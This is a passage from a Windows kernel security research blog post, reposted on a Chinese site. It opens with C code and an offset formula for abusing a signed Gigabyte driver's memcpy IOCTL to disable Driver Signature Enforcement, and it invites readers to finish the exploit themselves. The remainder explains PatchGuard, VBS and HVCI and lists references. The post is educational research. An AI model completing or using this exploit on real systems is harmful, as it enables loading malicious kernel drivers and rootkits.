BOOL EnumSystemDrivers(PVOID* ModuleBase, PCHAR ModuleImage) { _NtQuerySystemInformation NtQuerySystemInformation; PSYSTEM_MODULE_INFORMATION pModuleInfo; PSYSTEM_MODULE_INFORMATION_ENTRY pSystemModuleEntry = NULL; ULONG i, len; NTSTATUS ret; HMODULE ntdllHandle; CHAR kFullName[256]; ntdllHandle = GetModuleHandle(L"ntdll"); if (!ntdllHandle) return FALSE; NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(ntdllHandle, "NtQuerySystemInformation"); if (!NtQuerySystemInformation) return FALSE; ret = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); ret = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); if (g_ListDrivers) printf("Base Address\t ImageName\n"); for (i = 0; i < pModuleInfo->Count; i++) { if(g_ListDrivers) printf("%p %s\n", pModuleInfo->Module[i].Base, pModuleInfo->Module[i].ImageName); if (strstr(pModuleInfo->Module[i].ImageName, "CI.dll") != NULL) { strcpy_s(ModuleImage, sizeof(kFullName) - 1, pModuleInfo->Module[i].ImageName); *ModuleBase = pModuleInfo->Module[i].Base; } } return TRUE; }
We define a structure following what the driver expects and it’s documented on SecureAuth’s Advisory :
typedef struct _GIO_MemCpyStruct { ULONG64 dest; ULONG64* src; DWORD size; } GIO_MemCpyStruct;
And we call DeviceIoControl
using the vulnerable IOCTL.
DeviceIoControl(ghDriver, IOCTL_GIO_MEMCPY, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);
Then it’s just a matter of initializing the structure with the correct values, and simple math to calculate the exact address of the global variable we want to modify.
CiInitialize - hModule + kBase - 0x9eb8
You can easily finish the exploit yourself with the information above. Below is a quick demo of this “attack” (in a different VM without test signing mode, and without kernel debugging enabled). We start by loading the vulnerable Gigabyte’s signed driver. Then we disable DSE. We load our malicious driver successfully. And finally, we revert our changes (enabling DSE again).
So, is this exploit PatchGuard friendly? The CI.dll
variables are protected by PatchGuard
indeed (starting with Windows 8.1). However, this doesn’t mean we’ll get an instant PatchGuard
action ( bugcheck
). This will eventually lead to a bugcheck
when PatchGuard
notices the change. However, if we revert the change (restore the original state) we’ll be fine. There’s a risk here obviously, as we don’t know when is PatchGuard
going to look at our global variable. PatchGuard
runs randomly, so it can happen immediately after our change, 5 minutes later, one hour later, 24 hours later, we don’t know.
Kernel Patch Protection (KPP)
Kernel Patch Protection (KPP) , also known as PatchGuard
was first released for Windows XP 64-bit. Windows 32-bit systems don’t have PatchGuard
enabled (not even Windows 10), due to many crazy legacy 32-bit drivers “messing” with critical Windows kernel structures.
Windows server versions don’t support 32-bit systems anymore, and hopefully, these are going away on the desktop too. I couldn’t find any statistics that would confirm it, as Microsoft doesn’t share that data. Anyway, we all know that’s not easy to buy new 32-bit hardware anymore. I wouldn’t be surprised if Microsoft stops supporting 32-bit desktop systems too.
Anyway, what is PatchGuard? PatchGuard is a Windows Kernel anti-tampering system. Simply put, it creates hashes of the system’s critical structures and makes sure you don’t modify them.
As mentioned above, is worth notice that PatchGuard
just crashes the system in case it sees something wrong, it doesn’t do anything to prevent it, or revert any changes made. The bugcheck
code you’ll see is 0x109
, that is CRITICAL_STRUCTURE_CORRUPTION
. The best compilation of checks performed by PatchGuard
I could find was in the book Windows Internals Part 1 . Wikipedia also has a few but I wouldn’t trust it that much, as the sources for the claims are more than 10 years old. You can also find a few things you should avoid here .
As we know, many device drivers patch Windows kernel structures in a multitude of ways (such as, dangerous version-specific constructs/hard-coded offsets and code fingerprinting on frequently changing code) leading to system instability (to say the least). This is even true for Endpoint Security Software (actually AVs are/were the main cause of bugchecks for a long time). How ironic? One common case is/was patching the System Service Descriptor Table (SSDT) , which is a table containing the array of pointers for each system call handler. The idea is to intercept these system calls to add some functionality on top of it and keep the users safe. Some AVs for 32-bit systems might still do this, and Endpoint Security Software vendors aren’t the only ones patching Windows kernel structures. Malware does the same (leading to further instability), patching code already patched is tricky.
If we think about this problem, the truth is that protecting the kernel against these modifications is very hard (if not impossible) if everything is running in ring0
. It’s a race and a race that you can always win. There’s no security boundary. For Microsoft, there’s not even a security boundary between Administrator and ring0
(and I agree). This means that PatchGuard
is heavily obfuscated to avoid being reversed, and attacked. However, obfuscation is not a security boundary either. PatchGuard
is only about increasing the cost (in time, and complexity) to a potential attacker. As mentioned above, PatchGuard
is non-deterministic (random), and not documented, with the “ultimate” goal of making exploits unreliable (not stop them). PatchGuard doesn’t run the same checks all the time, and at once. It’s random, and multiple checks can run in parallel. Objectively, PatchGuard is security by obscurity at its best (at Microsoft maybe only 5 people have access to the source code, which is kept in a secret source code repository).
PatchGuard
is trying to enforce the use of supported mechanisms to have full visibility of what’s happening on the system. These supported mechanisms are the subject of this post. That is, processes/threads and image load notifications. Plus, mini-filter drivers (which allow on the fly “hooking” of all file operations). Object manager filtering (remove certain access rights on the fly), NDIS and WFP filters (access to raw ethernet packets), and ETW (mentioned before).
We need to keep in mind, that even with KPP
and DSE
we are still fighting a “lost” battle. Which is ring0
vs ring0
. Because of this, Microsoft now leverages the Hyper-V hypervisor to provide a new set of services known as Virtualization-based security (VBS) .
There are some AV vendors already rolling their own hypervisors based engines, and they will identify (as of today) the attacks mentioned before. Kaspersky , Avast , BitDefender , Qihu and maybe others that I’m not aware, already implement their Hypervisor, be warned. This doesn’t mean that the AV software you install in your PC comes with a Hypervisor. They don’t support nested virtualization ( at least without breaking stuff ). What happens, is that their cloud solutions run over their Hypervisor. What does this mean? Yes, all the files you have in your computer are “flying” to the cloud to be “analyzed”. If you were wondering how this is actually how Kaspersky has been detecting multiple 0days in the wild.
To know more about PatchGuard I highly recommend you to read the awesome research by Tetrane here: https://blog.tetrane.com/downloads/Tetrane_PatchGuard_Analysis_RS4_v1.01.pdf . Also, anything from Skywing (now the main authority behind it), and Uninformed is pure gold. Check the References
at the end of this post.
Virtualization-based Security (VBS)
With Virtualization-based Security , the kernel runs at a higher privilege than user-mode applications and is isolated from them.
In a nutshell, with VBS user-mode and kernel-mode code run in VTL 0 (traditional model) and is not aware of the existence of VTL 1. So, anything in VTL 1 can’t be accessed from VTL 0. This means that even if a malware actor obtains code execution in ring0
VTL 0, it still can’t access anything in VTL 1. Not even user-mode code (Isolated User Mode (IUM), as shown in the image below).
The best description and image illustrating what’s stated above I could find was from https://docs.microsoft.com/en-us/windows/win32/procthread/isolated-user-mode–ium–processes
- Microsoft copyrighted
Needless to say, that VTL 1 to be fully trusted, it requires Secure Boot, a non-compromised hypervisor, IOMMU supporting hardware , and the Intel Management Engine (ME) without vulnerabilities that can be exploited from VTL 0.
As described here , Virtual Secure Mode (VSM). VSM is a feature that leverages the virtualization extensions of the CPU to provide added security of data in memory. (…) VSM leverages the on chip virtualization extensions of the CPU to sequester critical processes and their memory against tampering from malicious entities.
How is this different from the traditional model? Here, the hypervisor sits in between the hardware and the host (OS), abstracting the OS from the hardware.
- Microsoft copyrighted
In this way, the VSM instance is segregated from the normal operating system functions and is protected by attempts to read information in that mode. The protections are hardware assisted, since the hypervisor is requesting the hardware treat those memory pages differently. This is the same way to two virtual machines on the same host cannot interact with each other; their memory is independent and hardware regulated to ensure each VM can only access its own data.
Thanks to VSM (Virtual Secure Mode), Windows 10 comes with Device Guard . Device Guard is not a feature, but a set of features designed to work together to prevent and eliminate untrusted code from running on a Windows 10 system.
Among others, we now have a protected mode where “sensitive” operations can be run. And this is from where Kernel Mode Code Integrity (KMCI) and the hypervisor code integrity control itself, which is called Hypervisor Code Integrity (HVCI) , come from. Plus Configurable Code Integrity (CCI) , which ensures that only trusted code runs from the boot loader onwards.
Configurable Code Integrity (CCI) allows the customization of a signature policy for user-mode and kernel code and protects the Windows OS from being compromised by “bad” drivers. Device Guard ensures the drivers are, at the least, signed by a known signature ( WHQL signed). Additionally, you can further restrict the drivers by whitelisting them in the policy. In this way, Device Guard will block drivers from loading dynamic code and block any driver that is not on the whitelist.
This is awesome and will mitigate the problem of bad actors bringing their own (known) vulnerable driver and exploit it. One thing to notice though is that, as of today, you’ll barely find a system with VBS enabled. Even though most of the hardware already supports it, there are way too many incompatibilities (VMWare, VirtualBox, etc) and everyone is turning it off. The latest release of Windows already comes with it enabled but only for fresh installs. If you have been upgrading your system it will be disabled.
Conclusions
This post only touches slightly on a small subset of the Windows Kernel Callbacks. The Windows Kernel has way more Callback mechanisms that are worth studying.
Many people say rootkits are dead. Are they? When we talk about rootkits people usually think about “hiding files”, “hiding processes”, and a few other lame things. This doesn’t make any sense. Rootkits are a path to something. Using a rootkit to hide a file, or a process is just “stupid”. There are many, many ways of doing things. Forensics tools will look at these things from multiple perspectives and they will catch you. You need to be smart. Remember Stuxnet ? They actually made this mistake. If you don’t know what mistake I’m talking about, it is time for you to do your research.
China, Russia, US, they all have kernel offensive capabilities. Today. People think PatchGuard solved an unsolvable problem. The trick is to learn how to live with PatchGuard, instead of trying to bypass it. If you do, the moment Microsoft finds out it will be patched. Look at InfinityHook for example (now patched). Also, if this subject interests you, make sure you look at the cool PatchGuard research from Tetrane (look at the references section below).
The reason we don’t see rootkits that often anymore it’s because, in my opinion, the cost of developing malware for the Windows Kernel increased. To load drivers into the Windows Kernel you either need a stolen certificate, a zero-day exploit or bring your vulnerable driver (like we saw with the Gigabyte driver). The complexity has increased indeed. Sc
also leaves a strong footprint, and persistence is tricky. However, there are ways around it. Remember DoublePulsar ? Do you know how it works?
As we slightly saw, even though PatchGuard is fighting a battle it can’t win, it is still quite interesting to study it. You can write a driver to emulate PatchGuard, and look at the same things PatchGuard is looking at.
Ultimately, the addition of the secure kernel and VBS is an exciting step in modern OS architecture. And, at the same time, very annoying. Microsoft Windows is likely the most complex program ever created for a personal computer, “ no one mind can comprehend it all “ . That means this is a never-ending story, with many chapters yet to be written.
To be continued.
Unsorted References
- https://docs.microsoft.com/en-gb/archive/blogs/ash/windows-10-device-guard-and-credential-guard-demystified
- https://docs.microsoft.com/en-us/cpp/c-runtime-library/sal-annotations?view=vs-2019
- https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)
- https://docs.microsoft.com/en-us/sysinternals/downloads/debugview
- https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer
- https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
- https://docs.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10
- https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryw
- https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory
- https://docs.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-list_entry
- https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread
- https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc
- https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext
- https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-createservicea
- https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-messagebox
- https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexa
- https://docs.microsoft.com/en-us/windows/win32/etw/about-event-tracing
- https://docs.microsoft.com/en-us/windows/win32/procthread/isolated-user-mode–ium–processes
- https://docs.microsoft.com/en-us/windows/wsl/faq
- https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-device-guard
- https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/aux_klib/nf-aux_klib-auxklibquerymoduleinformation
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-psremovecreatethreadnotifyroutine
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-psremoveloadimagenotifyroutine
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutine
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutineex
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutineex2
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreatethreadnotifyroutine
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetloadimagenotifyroutine
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-pslookupprocessbyprocessid
- https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugging-using-windbg-preview
- https://docs.microsoft.com/en-us/windows-hardware/drivers/download-the-wdk
- https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option
- https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-test-signature-program
- https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/callback-objects
- https://docs.microsoft.com/en-us/windows-hardware/test/hlk/testref/driver-compatibility-with-device-guard
- https://docs.microsoft.com/windows-hardware/drivers/ddi/ntddk/nc-ntddk-pcreate_process_notify_routine_ex
- https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-release-signature
- https://docs.microsoft.com/en-us/windows-hardware/drivers/install/kernel-mode-code-signing-policy–windows-vista-and-later-
- https://docs.microsoft.com/en-gb/windows-hardware/drivers/dashboard/get-a-code-signing-certificate
- https://docs.microsoft.com/en-gb/windows-hardware/drivers/dashboard/register-for-the-hardware-program
- https://en.wikipedia.org/wiki/DoublePulsar
- https://en.wikipedia.org/wiki/Endpoint_Detection_and_Response
- https://en.wikipedia.org/wiki/Fatal_system_error
- https://en.wikipedia.org/wiki/Hooking
- https://en.wikipedia.org/wiki/Hyper-V
- https://en.wikipedia.org/wiki/Intel_Management_Engine
- https://en.wikipedia.org/wiki/Kernel_Patch_Protection
- https://en.wikipedia.org/wiki/List_of_IOMMU-supporting_hardware
- https://en.wikipedia.org/wiki/Rootkit
- https://en.wikipedia.org/wiki/Stuxnet
- https://en.wikipedia.org/wiki/System_Service_Descriptor_Table
- https://en.wikipedia.org/wiki/Windows_Defender
- https://en.wikipedia.org/wiki/Windows_Vista
- https://j00ru.vexillium.org/2010/06/insight-into-the-driver-signature-enforcement/
- https://j00ru.vexillium.org/2011/06/smep-what-is-it-and-how-to-beat-it-on-windows/
- https://j00ru.vexillium.org/2012/11/defeating-windows-driver-signature-enforcement-part-1-default-drivers/
- https://github.com/9176324/Shark
- https://github.com/can1357/ByePg
- https://github.com/comaeio/SwishDbgExt
- https://github.com/everdox/InfinityHook
- https://github.com/fdiskyou/injectAllTheThings
- https://github.com/fdiskyou/threat-INTel/blob/master/2015/The_Mystery_of_Duqu_2_0_a_sophisticated_cyberespionage_actor_returns.pdf
- https://github.com/fdiskyou/wdk-header-files/blob/master/win10rs5/ntddk.h
- https://github.com/fdiskyou/windows-ps-callbacks-experiments
- https://github.com/hfiref0x/DSEFix
- https://github.com/hfiref0x/KDU
- https://github.com/hfiref0x/KDU/tree/master/Source/Examples/BadRkDemo
- https://github.com/hfiref0x/Stryker
- https://github.com/hfiref0x/TDL
- https://github.com/hfiref0x/UPGDSED
- https://github.com/killvxk/DisableWin10PatchguardPoc
- https://github.com/Mattiwatti/EfiGuard
- https://github.com/niemand-sec/AntiCheat-Testing-Framework
- https://github.com/seporaitis/xv6-public/wiki/CPU-Registers-CR0
- https://github.com/stephenfewer/ReflectiveDLLInjection
- https://github.com/tandasat/findpg
- https://github.com/tandasat/PgResarch
- https://github.com/zerosum0x0/puppetstrings
- https://github.com/zhuhuibeishadiao/PatchGuardResearch
- http://codemachine.com/article_kernel_callback_functions.html
- http://deniable.org/misc/inject-all-the-things
- http://standa-note.blogspot.com/2014/11/debugging-early-boot-stages-of-windows.html
- http://standa-note.blogspot.com/2015/01/a-lst-of-patchguard-v81-related.html
- http://standa-note.blogspot.com/2015/08/writing-hypervisor-for-kernel-mode-code.html
- http://standa-note.blogspot.com/2015/10/some-tips-to-analyze-patchguard.html
- http://www.capstone-engine.org/
- https://zydis.re/
- http://www.nosuchcon.org/talks/2014/D2_01_Andrea_Allievi_Win8.1_Patch_protections.pdf
- http://www.powerofcommunity.net/poc2012/mj0011.pdf
- http://www.sekoia.fr/blog/windows-driver-signing-bypass-by-derusbi/
- http://www.uninformed.org/?v=3&a=3
- http://www.uninformed.org/?v=6&a=1&t=sumry
- http://www.uninformed.org/?v=all&a=38&t=sumry
- http://uninformed.org/index.cgi?v=8&a=5
- https://blog.ensilo.com/windows-pssetloadimagenotifyroutine-callbacks-the-good-the-bad-and-the-unclear-part-1
- https://blog.ensilo.com/windows-pssetloadimagenotifyroutine-callbacks-the-good-the-bad-and-the-unclear-part-2
- https://blog.talosintelligence.com/2014/08/the-windows-81-kernel-patch-protection.html
- https://blog.tetrane.com/downloads/Tetrane_PatchGuard_Analysis_RS4_v1.00.pdf
- https://blog.tetrane.com/downloads/Tetrane_PatchGuard_Analysis_RS4_v1.01.pdf
- https://code.google.com/archive/p/bypass-x64-dse/downloads
- https://csrc.nist.gov/CSRC/media/projects/cryptographic-module-validation-program/documents/security-policies/140sp1327.pdf
- https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk
- https://forum.avast.com/index.php?topic=162445.60
- https://githomelab.ru/pykd/pykd
- https://i.blackhat.com/us-18/Thu-August-9/us-18-Desimone-Kernel-Mode-Threats-and-Practical-Defenses.pdf
- http://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf
- https://leanpub.com/windowskernelprogramming
- https://medium.com/yarden-shafir/yes-more-callbacks-the-kernel-extension-mechanism-c7300119a37a
- https://os.kaspersky.com/products/kaspersky-secure-hypervisor/
- https://processhacker.sourceforge.io/
- https://securelist.com/elevation-of-privileges-in-namco-driver/83707/
- https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FRtlCreateUserThread.html
- https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtCreateThread.html
- https://visualstudio.microsoft.com/vs/
- https://web.archive.org/web/20130413005705/http://www.saferbytes.it/2012/09/18/uefi-technology-say-hello-to-the-windows-8-bootkit/
- https://web.archive.org/web/20160417224229/http://www.vrtulex.net/download/ostatni/prirucky/kernel-data-filtering.pdf
- https://www.360totalsecurity.com/en/
- https://www.amazon.co.uk/Windows-Internals-Part-architecture-management/dp/0735684189/
- https://www.avast.com/en-gb/technology/malware-detection-and-blocking
- https://www.bitdefender.com/business/enterprise-products/hypervisor-introspection.html
- https://www.codemachine.com/article_kernel_callback_functions.html
- https://www.codeproject.com/Articles/28318/Bypassing-PatchGuard-3
- https://www.felixcloutier.com/x86/lea
- https://www.gaijin.at/en/infos/windows-version-numbers
- https://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/eprocess/index.htm
- http://www.geoffchappell.com/notes/security/whqlsettings/index.htm
- https://www.microsoft.com/
- https://www.osronline.com/article.cfm%5Earticle=157.htm
- https://www.pcgamesn.com/street-fighter-v/sfv-capcom-rootkit-security
- https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities
- https://www.symantec.com/connect/blogs/reality-check-patchguard
- https://www.trendmicro.com/vinfo/pl/security/news/security-technology/windows-kernel-bug-found-can-be-abused-to-reportedly-bypass-security-systems
- https://www.triplefault.io/2017/09/enumerating-process-thread-and-image.html
- https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html
- https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html
- https://www.youtube.com/watch?v=85H4RvPGIX4
- https://christopher-vella.com/2019/09/06/recent-edr-av-observations/
- https://www.davidegrayson.com/signing/
- https://www.davidegrayson.com/signing/#kmod
- https://channel9.msdn.com/Events/Windows/Filter-Plugfest28/Driver-Certification-on-Windows-Client-and-Server
- http://www.nynaeve.net/?p=111
- http://fyyre.ru/vault/bootloader.txt
- http://fyyre.ru/vault/bootloader_v2.txt
- https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/Windows_81_Kernel_Patch_Protection_Analysis.pdf
- https://blog.talosintelligence.com/2014/08/the-windows-81-kernel-patch-protection.html
- http://www.zer0mem.sk/?p=271
- https://web.archive.org/web/20140824075154/https://www.mcafee.com/us/resources/reports/rp-defeating-patchguard.pdf
- https://code.google.com/archive/p/easyhook-continuing-detours/wikis/PatchGuard.wiki
以上所述就是小编给大家介绍的《Windows Kernel Ps Callbacks Experiments》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
穿越计算机的迷雾
李忠 / 电子工业出版社 / 2011-1 / 36.00元
《穿越计算机的迷雾》从最基本的电学知识开始,带领读者一步一步、从无到有地制造一台能全自动工作的计算机。在这个过程中,读者可以学习到大量有趣的电学、数学和逻辑学知识,了解到它们是如何为电子计算机的产生创造条件,并促使它不断向着更快、更小、更强的方向发展。通过阅读《穿越计算机的迷雾》,读者可以很容易地理解自动计算实际上是如何发生的,而现代的计算机又是怎么工作的。以此为基础,在《穿越计算机的迷雾》的后面......一起来看看 《穿越计算机的迷雾》 这本书的介绍吧!